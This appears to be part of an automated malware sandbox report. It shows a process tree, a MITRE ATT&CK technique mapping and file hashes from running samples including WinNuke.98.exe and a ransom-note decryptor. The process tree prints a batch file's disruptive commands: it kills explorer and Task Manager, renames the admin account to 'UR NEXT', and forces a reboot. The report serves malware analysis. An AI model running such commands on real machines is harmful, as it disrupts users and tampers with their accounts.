  - Modifies WinLogon
  - Sets desktop wallpaper using registry
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:3288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\windl.bat""
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1508
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im explorer.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:2904
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im taskmgr.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      PID:2372
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic useraccount where name='Admin' set FullName='UR NEXT'
      4⤵
      System Location Discovery: System Language Discovery
      PID:4696
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic useraccount where name='Admin' rename 'UR NEXT'
      4⤵
      System Location Discovery: System Language Discovery
      PID:3124
  - - C:\Windows\SysWOW64\shutdown.exe
      shutdown /f /r /t 0
      4⤵
      PID:688

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1496

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1744

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3912

C:\Users\Admin\Downloads\Avoid.exe
"C:\Users\Admin\Downloads\Avoid.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:3264

C:\Users\Admin\Downloads\Avoid.exe
"C:\Users\Admin\Downloads\Avoid.exe"
1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
PID:1780

C:\Users\Admin\Downloads\Avoid.exe
"C:\Users\Admin\Downloads\Avoid.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:2788

C:\Users\Admin\Downloads\WinNuke.98.exe
"C:\Users\Admin\Downloads\WinNuke.98.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3612

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3952

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\@[email protected]
1⤵
PID:208

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Public\Desktop\@[email protected]"
1⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4864

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:4852

C:\Users\Public\Desktop\@[email protected]
"C:\Users\Public\Desktop\@[email protected]"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2652

C:\Users\Admin\Desktop\@[email protected]
"C:\Users\Admin\Desktop\@[email protected]"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4752

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4456

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:692

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa38e0055 /state1:0x41c64e6d
1⤵
PID:4916

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Defense Evasion

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\@[email protected]

Filesize
585B

MD5
b52a885295af5627a87f47f53e6af3a2

SHA1
c9d476717cf6be7b8bc76a561ae62569a556530d

SHA256
ca0e3643c1dca5bbf0ee5fa8cf0a4ddf1269491d10035ee8685c81374c7253e0

SHA512
7417868b69b956f3e0486d33f691290bf1e601968bb6467b5a51946dfa16d1787854cb85b395285383d18521d5c64bc30df862faefc9a1d81fdcb6e43b0e96e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
908f9c2c703e0a6f81afb07a882b3e30

SHA1
53ed94a3145691e806e7dd8c160f5b459a2d16ef

SHA256
4436bec398522c5119d3a7b9c41356048c19d9c476246c76d7a4c1ee28160b52

SHA512
7af7116a91c8e3dfc23db8a78d7aff9a8df8e3b67df7f4ee66f9380dba4d1e66d980afaefc5dc2d9034ab5c0b7c6934400feb32645373f3ff4f8816414ae6ff4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

Filesize
48KB

MD5
df1d27ed34798e62c1b48fb4d5aa4904

SHA1
2e1052b9d649a404cbf8152c47b85c6bc5edc0c9

SHA256
c344508bd16c376f827cf568ef936ad2517174d72bf7154f8b781a621250cc86

SHA512
411311be9bfdf7a890adc15fe89e6f363bc083a186bb9bcb02be13afb60df7ebb545d484c597b5eecdbfb2f86cd246c21678209aa61be3631f983c60e5d5ca94

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

Filesize
64KB

MD5
d6b36c7d4b06f140f860ddc91a4c659c

SHA1
ccf16571637b8d3e4c9423688c5bd06167bfb9e9

SHA256
34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92

SHA512
2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004

Filesize
19KB

MD5
1bd4ae71ef8e69ad4b5ffd8dc7d2dcb5

SHA1
6dd8803e59949c985d6a9df2f26c833041a5178c

SHA256
af18b3681e8e2a1e8dc34c2aa60530dc8d8a9258c4d562cbe20c898d5de98725

SHA512
b3ff083b669aca75549396250e05344ba2f1c021468589f2bd6f1b977b7f11df00f958bbbd22f07708b5d30d0260f39d8de57e75382b3ab8e78a2c41ef428863

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

Filesize
63KB

MD5
226541550a51911c375216f718493f65

SHA1
f6e608468401f9384cabdef45ca19e2afacc84bd

SHA256
caecff4179910ce0ff470f9fa9eb4349e8fb717fa1432cf19987450a4e1ef4a5

SHA512
2947b309f15e0e321beb9506861883fde8391c6f6140178c7e6ee7750d6418266360c335477cae0b067a6a6d86935ec5f7acdfdacc9edffa8b04ec71be210516

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
70KB

MD5
3b06aa689e8bf1aed00d923a55cfdd49

SHA1
ca186701396ba24d747438e6de95397ed5014361

SHA256
cd1569510154d7fa83732ccf69e41e833421f4e5ec7f70a5353ad07940ec445c

SHA512
0422b94ec68439a172281605264dede7b987804b3acfdeeb86ca7b12249e0bd90e8e625f9549a9635165034b089d59861260bedf7676f9fa68c5b332123035ed

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

Filesize
25KB

MD5
e580283a2015072bac6b880355fe117e

SHA1
0c0f3ca89e1a9da80cd5f536130ce5da3ad64bfe

SHA256
be8b1b612f207b673b1b031a7c67f8e2421d57a305bebf11d94f1c6e47d569ee

SHA512
65903ba8657d145cc3bbe37f5688b803ee03dd8ff8da23b587f64acaa793eaea52fcb6e8c0ec5032e0e3a2faacc917406ada179706182ce757d1c02979986dd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

Filesize
20KB

MD5
99c59b603e12ae38a2bbc5d4d70c673e

SHA1
50ed7bb3e9644989681562a48b68797c247c3c14

SHA256
0b68cf3fd9c7c7f0f42405091daa1dda71da4a1e92ba17dad29feb00b63ef45f

SHA512
70973ea531ed385b64a3d4cb5b42a9b1145ec884400da1d27f31f79b4597f611dc5d1e32281003132dd22bf74882a937fc504441e5280d055520bfca737cf157

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

Filesize
37KB

MD5
5873d4dc68262e39277991d929fa0226

SHA1
182eb3a0a6ee99ed84d7228e353705fd2605659a

SHA256
722960c9394405f7d8d0f48b91b49370e4880321c9d5445883aec7a2ca842ab4

SHA512
1ec06c216bfe254afbae0b16905d36adc31e666564f337eb260335ef2985b8c36f02999f93ab379293048226624a59832bfb1f2fa69d94a36c3ca2fdeebcdc3f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

Filesize
38KB

MD5
adf2df4a8072227a229a3f8cf81dc9df

SHA1
48b588df27e0a83fa3c56d97d68700170a58bd36

SHA256
2fd56ac4d62fec83843c83054e5548834a19001c077cdb224901237f2e2c0e4c

SHA512
d18ffc9a41157ea96014a503640b3a2a3931f578293e88cc05aa61c8223221d948c05637875d8e3ee5847b6a99341ea22b6a1aee67c170e27bde5e154cf1b9ca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c

Filesize
21KB

MD5
6ff1a4dbde24234c02a746915c7d8b8d

SHA1
3a97be8e446af5cac8b5eaccd2f238d5173b3cb3

SHA256
2faaca6a253d69be3efb96620ba30e53ecb3de12d5285b83ecdba8cbc36e7311

SHA512
f117b822aeb0a434a0750c44cbf4cdf627bfebc0d59e266993a4fcb17a7a0519659e13b3bcf8706eed7d80d0ce33b0ce5915afe5872c37c010a401dd6bb1187b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000d

Filesize
26KB

MD5
525579bebb76f28a5731e8606e80014c

SHA1
73b822370d96e8420a4cdeef1c40ed78a847d8b4

SHA256
f38998984e6b19271846322441f439e231836622e746a2f6577a8848e5eed503

SHA512
18219147fca7306220b6e8231ff85ebeb409c5cc512adff65c04437d0f99582751ccb24b531bbedf21f981c6955c044074a4405702c3a4fae3b9bf435018cc1a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e

Filesize
18KB

MD5
8bd66dfc42a1353c5e996cd88dc1501f

SHA1
dc779a25ab37913f3198eb6f8c4d89e2a05635a6

SHA256
ef8772f5b2cf54057e1cfb7cb2e61f09cbd20db5ee307133caf517831a5df839

SHA512
203a46b2d09da788614b86480d81769011c7d42e833fa33a19e99c86a987a3bd8755b89906b9fd0497a80a5cf27f1c5e795a66fe3d1c4a921667ec745ccf22f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000f

Filesize
18KB

MD5
f1dceb6be9699ca70cc78d9f43796141

SHA1
6b80d6b7d9b342d7921eae12478fc90a611b9372

SHA256
5898782f74bbdeaa5b06f660874870e1d4216bb98a7f6d9eddfbc4f7ae97d66f

SHA512
b02b9eba24a42caea7d408e6e4ae7ad35c2d7f163fd754b7507fc39bea5d5649e54d44b002075a6a32fca4395619286e9fb36b61736c535a91fe2d9be79048de

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000010

Filesize
59KB

MD5
25b3d7b6beb44eb20ffd065656c15e1d

SHA1
59301a1a36a144715b51bdccde1eb2a328f7efd3

SHA256
00a88a411e1a1ba98f55fae99469271160c23d87b1f71f90f31a7810f063db9d

SHA512
8c71c4b268832f016dc20f68611abe976294421217f7834b5d409b53b0f0b137231c9364eaa84eb1afb05fbb121a0ebd263e52ba60cda157ae892219b462e145

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000011

Filesize
16KB

MD5
dde035d148d344c412bd7ba8016cf9c6

SHA1
fb923138d1cde1f7876d03ca9d30d1accbcf6f34

SHA256
bcff459088f46809fba3c1d46ee97b79675c44f589293d1d661192cf41c05da9

SHA512
87843b8eb37be13e746eb05583441cb4a6e16c3d199788c457672e29fdadc501fc25245095b73cf7712e611f5ff40b37e27fca5ec3fa9eb26d94c546af8b2bc0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000012

Filesize
41KB

MD5
082c469b33a31285b4c182bbe6a1b499

SHA1
d2525c741034e1ea6002707ef528a270fbd2fed6

SHA256
09ea9ec8594cabda1edc0ca1ee990be1f5c564d0dac06e6a07ac03623e5f4f1a

SHA512
a731c121e9438f8d5cc0fd28939b0493f5bb37013b60e78054fa6c4e3f72d4cd52c5bcd9e3dee36903fdc7e06aa3af879d706f360eaf6ebf750ba74d595263b8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000013

Filesize
55KB

MD5
c649e6cc75cd77864686cfd918842a19

SHA1
86ee00041481009c794cd3ae0e8784df6432e5ec

SHA256
f451a4a37826390ab4ea966706292ee7dd41039d1bedc882cbc8392734535393

SHA512
e9e779870071fe309bbde9b6a278d9627c7f2402b55ac4c0a48c65b1de5172cf9dad2992f8619d7e7aaf978e6ccd607620de88554aa963f3d45501913ed49f64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000014

Filesize
87KB

MD5
65b0f915e780d51aa0bca6313a034f32

SHA1
3dd3659cfd5d3fe3adc95e447a0d23c214a3f580

SHA256
27f0d8282b7347ae6cd6d5a980d70020b68cace0fbe53ad32048f314a86d4f16

SHA512
e5af841fd4266710d181a114a10585428c1572eb0cd4538be765f9f76019a1f3ea20e594a7ee384d219a30a1d958c482f5b1920551235941eec1bcacd01e4b6f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000015

Filesize
18KB

MD5
ec02df94928186d3c6b59ce65f9000a3

SHA1
ff25873724d5bee7c3a1b0f70853f3f4db93056c

SHA256
31d2638dfacb6328063cfadac99239427e0eee86cd28e2deddfe4daa39c55674

SHA512
69ddeb0dd61ed03bc060b9399504988ee0c72c4de46e3a6efc967bb3686a593dca9362121d9b5106e9f2e355238614c5d108cf28354b53e5aff6f5e2e112b873

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000016

Filesize
22KB

MD5
9b5558381a28d410bf93be576c4e1ec6

SHA1
67c25103d7e61f1b482a665fa0d86921876765d4

SHA256
0adaedd1b52daea4ac19cbe9c095eeab8d4f288c1eef838aa416308580cbc665

SHA512
aaf3b065030b0fb7c5a689d4c44d5cc2cb0ca6a79ce7cdeca3c745c01bf4f64e44de2ddf8e06cbb35eafe0e7a005a34178c4185a5d4cd4fdab6fdc20df44e0f9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000017

Filesize
107KB

MD5
11341f03f951333b4309822a7ebb0907

SHA1
fc813cb6a262e6ef9991bfa2711ba75e7a0894dc

SHA256
99aa368241f22add83b34dd05541d726ab42a65f3e9c350e31c0129684b50c1a

SHA512
089cbd6d797f4e086e945dbb1345f4023fb0ef4daa9d47368ae7f253cbaea7b6236cfebf0d19741aba415ec4f1c3443050cabad756c55514ba2bc0bd7442bac5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000018

Filesize
16KB

MD5
686cd4e029335cb803ea8b47ea727bd5

SHA1
acb03acb24c943d81a8e4822466201cc4114692c

SHA256
785ffc242cb18f8e9ccb9ab96c37df3cdf1612a38a325a2a9bcf8164eac6488d

SHA512
a54e055ca8e021757102aa6c7f9045959fa32a7db215595cda8419ac96f75f44e1f5846037e14b6a20d0db51c4b1e974aff1718e16ff5d7650e0b667ca09721c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001c

Filesize
65KB

MD5
3d636838c651670d5e9dcb2732402a4a

SHA1
499511c375549d73ef30e24b978d58d9474eb8ec

SHA256
e7fdbe8a4e3878599e0c65beb8a6adb3f4e9db532cfa1ab3e24ed8baddbd1b84

SHA512
91df5fe15084597a2eee81b9590414560d70776b2d88d1e896966dc59823819272af1b171ede68ddabf62a1e6e3dd493e5989f6f6ebdea359f9ce700ac96114c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\769c061e8cd16503_0

Filesize
1KB

MD5
249bbbae9206e2b5ceab274ae3ca6695

SHA1
e325013766664169102686fbe3b286787c053799

SHA256
93384ca78e98b9faf4f0a08cf921dd676b2ac74fdb676cd48357c9994fe575b9

SHA512
22ba9b533bb36766e152e84ea51ee61a1d42786377fb4e48fc36f0b1a84dcc67aa309cca9730c620198cd28ff81aa314cb625de5b6a62e289e4fc4e6ed5810fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\cc73beeb35d2d9d4_0

Filesize
1KB

MD5
9566a5a9e3885b6ab83d2c21f08939fe

SHA1
dd162b400766b84eaa2b8509fee7f2dfdcda3df0

SHA256
2a5228fec6151db5f4d2f65d103ae4c602c78f6b63baded913ad290ffd82c2d8

SHA512
e6de6ed38e2d83c5fe4ae951dc4e3f776e874e97dfd08c0ebcd8db7a339d0706c8556ab65389ffb8a0ca7d03d79a7c15a86c4adba429db101476608a9e4bb0cf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\cd682d85597fe6b3_0

Filesize
2KB

MD5
76470fc0e566ddf443a14b1b919fd1ea

SHA1
1b0ac31cd4533eff7a49b8315ac195cfa152a3ea

SHA256
69772486ba1c903fe62f2d6dc71cf279d71c7bbd787d4b3ea654bb542d7a5edd

SHA512
a70dc5f354d622c9d36f16a41ee522047563364a864327aef0401aeb8a5e78cd1897cbd47fb336081b1846e9ebed78720004e4e0edd2e6471a0a78a8d51f69da

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\e29949039513e5b9_0

Filesize
1KB

MD5
7f6244fdea83d305af80827397b45923

SHA1
760419beab053a1e3b9d5d00ff9f2e9a63ea51d6

SHA256
11968fd6c8782b39bda58fd9e9eef7f39a9011342baee6bb011bc7fb2caf5707

SHA512
ea01f692893963e1fb841a41675e0e554be4bdbc5778b0b027201ee2e9c8208a3a5b77d7831c9ee7797ec7e175a409d0269a44f2bebe120ddd0f87036030c015

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index

Filesize
3KB

MD5
4ffe0d8bb98d42ca153ce5d8f7b19b76

SHA1
ccdb87ede766d1f9aa1a79259291c97d052fb63b

SHA256
41bc3b2358574ef6aa79a5d3e7501a6ec0b7db2e16441fbd6d62345464d88b0c

SHA512
9bbe7070514fd84f429068450dbfd22a17b6bbf16993ee069cbb32ae5e771890cabecc878d498e484e8edba6bcbd55b8fd628bb2c1fddb22be485dfdf2a88f1a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
272dcc99603fd53689b420e82ad0b8ab

SHA1
d61d871708e80655bb7120b0c94387d0506b7ca2

SHA256
d5a9a5af0204dc443b6a058d487291397ed66e42f6b190dfa105f9ea62acd67b

SHA512
8bd713e07189d3fc2982c82c79f553feae76a187d370b9dd366b6caec6ba716a2a9a391ea5b887a2175c87f836c100d4cb25d7febcfad110625334fcd921c6d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
3b1350d928c85db56c77fc523155000a

SHA1
08e15c934b0de2934ea24172e2644846d270001b

SHA256
b0e2171cfc475d255f3a19f999a9156eb6eec5757ee16bd4869c8785e058534a

SHA512
9622920c6405a4c0a7d170c546bb651da7e6ad74dff9319f45706a2e244e04778b7fdf416033f24310be255beef1485e93a3f25575648829dda781c72bb51dd9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
e403f70c5f073af4151f6d8637d01a60

SHA1
2b12b3b1b9a0290f1636be411d0996603c95d3ea

SHA256
e922ea0141b963b53ceeeedd06a4589953ee4270755ae58b16931fe171c6ad32

SHA512
8c6288fde1852d1e8d25d067bdcb7cd21b392b7bf200a00879d146c3a702b9c882045a5769fc86e423d41f6db6d727c812ca8090a9f6ea8c61dbd93fe104d434

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
3KB

MD5
7e0f676da0393c6e0226bc28b453ed42

SHA1
d9a60236db569bf23557d60f34646021791cf6c3

SHA256
5576fef7e1569a1e7fa32e3834e4c71435e1b5d8b5906eb9daa54e3fbecb5b4c

SHA512
04eb56c89d25a1ffaa41c847e3a68cbba15bb58bae9a060ef662cb45efb7d012db812048d2a309fba755687910465f100961fde454daeda04dfadc7a322eb364

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
945B

MD5
cc54b8b2b0079276aede470d802b8854

SHA1
899d60c305073ae64574bd7e7d3f7b2bfee226ae

SHA256
41be7d57dfbe8ffea300e2fbd0e24a8963d37e8c4c387a8bac55691e4b9d6424

SHA512
8d7a41b1af98900a5d6eb50bfe671fa216de4933bc2429dd5dfe9e93a3158a2d13e58724b5df7141f4246122614a42d15c8d81a215d98d721b1452daecabfdfb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
871B

MD5
2aa577d068b5f00ad0b861614538f6b3

SHA1
1b58ad265f27ccb37b93ccb8df2f932e95f02dea

SHA256
fe3ae0a69354a2144a07b3d72eee9472c34b4ec87637426b7bb941734099394c

SHA512
5ba24ef2146aa15574db92a9759fed8bfeb56acde12c4558ff4ce276e1984600051103292226f314d042b9df6779f1fde64808c7a81520471ec4ec9e2179629e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
ffcd79bdf0a674f4ef54c204760aa351

SHA1
e3994137e977954d46d52ff80bacbbb26f802225

SHA256
84dabf3bbea289e6030dff6f91c89638799ff0904bafcd1f8cebad259dad728e

SHA512
c523e319f0706521cd07ea7006b6a78b343ffb842526e9aa36c11e622f251f146020fc5847ce5efd9025e793419a3671512000f6d2dc8b53e96474cd1ac42a09

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
35169d87e8231e9a1311b043653ef07e

SHA1
491c3286cd295cb1c74396605467909d1fa43491

SHA256
c2de9153b505d6270cfcb495d7ac9e8d5ba1529a90b199d4cf26102b2a943809

SHA512
08ce29e07d66fdb3279e15abafda737ffbe7592b581c24daa0fdad240b33212a6d4899d9671d7a4284b1de4881fe39315e2d13c38ab62e409ca7f322f043fdca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
707ff22fbfc2b06a7646ea8220761018

SHA1
6871ea3cd0a5bee749833731b591b8aabd7d1c86

SHA256
8f88bfdc7444e15ebca7b521264213a086a870ff71d7e3300d02910e40fa82a0

SHA512
d267ea6d695e15ee79dca5aef8ce0529fddc3832c5d1db84caccc3c35d807b9abc26f3b5279467810c07dd889ad7c264ad23f68b450f620cd34d9740c466d6ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
755508a3126f6950ceaa08a3a5b0ce4d

SHA1
3bcf00c34aee3d9574ccde5ebb758f0c331e84dc

SHA256
902213dcae2d7af6f369bfc96e17d707afe82e988b21907f33c98db86c06e841

SHA512
8f9c44b81258f77845c8b1760863e9777355bd050eb4336f649fe6efe883b8b34e053af12a08ab82cdb9b74e8c65085a294f378004d87ecb882e333cf6d72edd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
662da9cc92e8803b00e641538034c734

SHA1
357386bbf3cd647296244a492766e06cfc5e3608

SHA256
0fe93cfd6acfad0e78ea551070aa63b8526effce1e02fbc61ba811ab8cbaec2e

SHA512
ccdcf06ec08f7657bd7a657c274b9256d9daafa9072c9df644e67b5b884b445dc2d236fac7623c242f48d46899c3ebba87e22be366b787daf1533354165aa8fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
6f1b8531347ffba6f29d38357e42e384

SHA1
590791e519e9f01ba211496ec6920b931dd13f1e

SHA256
017ca270111c58ba072a05911447163b5aaff611ccbda733c27b752e4a6ab2d7

SHA512
cff551384f579d7ef4b03c31ff3be2fa1ba90db585d6dcbb1dadca48630328741d458e118aa565111a7f60fbbf6a9c49dabdc5c7db2ad5ffce50510b84f2e13c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
bef9bfdaadd50e4ae95e49c97d489fac

SHA1
b51a807177ca89650ce8888d9dc8c78749288dd8

SHA256
731371ab26cd094947fa914691ea2b29edc90af6dd9bcbca7b5161dbc1b6ecb6

SHA512
4d6c6e64eacbd7dfc2ff0417bf3ff3bc517077d0e1e81476c56278bec6a580f4139428bbdbe13772243e8e6305e7818a18ec79fd347f99798a057ea00b409983

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
b41669d45842cccbbb736df99d81e88f

SHA1
edf41086c369a008c2ecafebbafb6068ced9e236

SHA256
d1df6ea3342f59a6e172163644abc4315d4b5bd2c00fe9e5b44bfa0246bd19de

SHA512
de6dc9f3fa40c55dabe9c3fb8bea13652a3056e2c63cfb7e22d2571c3df3546cffecaab79dfa8cbe45f175f24c81c6bdd315b15fedb01303d52d8409561a515f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
f9578ed260b6303bbbe2bc78bf12d998

SHA1
da93b375ae1b299af0db363193a2346515eb5c1d

SHA256
e17be5b350d1116ba156297798afe13ef134ee64b4b5457ee9a5e7bf9dd2443e

SHA512
e2f02aafa890b8e8bea06cfc5c49aeb9bd36d11d7b3629d9099befd37e7b734fb85f32ecca2882dd50999ca88f17228870b7dfa5cd2801fe452231f8970ffb5b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
f41c376e67dec473397fd13b75bd7361

SHA1
300c8eb115882f9ddd8db18b08a2833958c8da52

SHA256
b7f7cd28c988fd68b7fe723bd3c32f5ab826b0587f4b306f10001e42bdafacb5

SHA512
408f2912ed91589a8124811f78cd9bcc31b2b7037ec24d444e8e4626bbd60976469db36ce073dc6ad32112e984fdb419548da126f35ed8d6c1c020e27ca8df58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
70e1dda9be9afa2f0fbce4a9235fca75

SHA1
55860f3b77a13f5fa5b4c69cc4832af2cca29c38

SHA256
c659bfe55a1d7b48b6818d240950c7827cdd3c24bfc8484942d961b1250d6490

SHA512
4f53335e20a67eb7faee838d9d9fcd519db828eb3f793f5adbb91cb932ba5f0cc32670ee7ac96a9b3c2771f1a26489795a97beb03233a0571785711315d7c9a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
568d095f6ab7c3f3e00f8cf11255f074

SHA1
8ec4ea49b022e8f4a345a23f98968210ee15922b

SHA256
370ed2dfb879ba178636ddf8e5befc47d6b5274b043511fe8b64c655d9da1556

SHA512
91e925bdba69ca8fa43f90654faeb20c0664d30c5150ebae9fbb406b5bc6f8fc40955b57c531790eeb9147b6b3a1ef2510060642e9141c5639cf35984f64c39c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
88fdcce94380d5714008e3327d0e999f

SHA1
0949fcc9f31acc751509b59f24c360ec0a2950b6

SHA256
61d71bb97314444c3a42c2560f94afbd29381bc1cdd7d2e4bad442c747b2bf40

SHA512
4bf4eb60664d1404bc371edd3d87893f910e564ebae462ccff286d36c58657caf7ecf31986107a2af916936948f13c3a31abad2ca10d3e785b4356bc64375e67

Download Submit
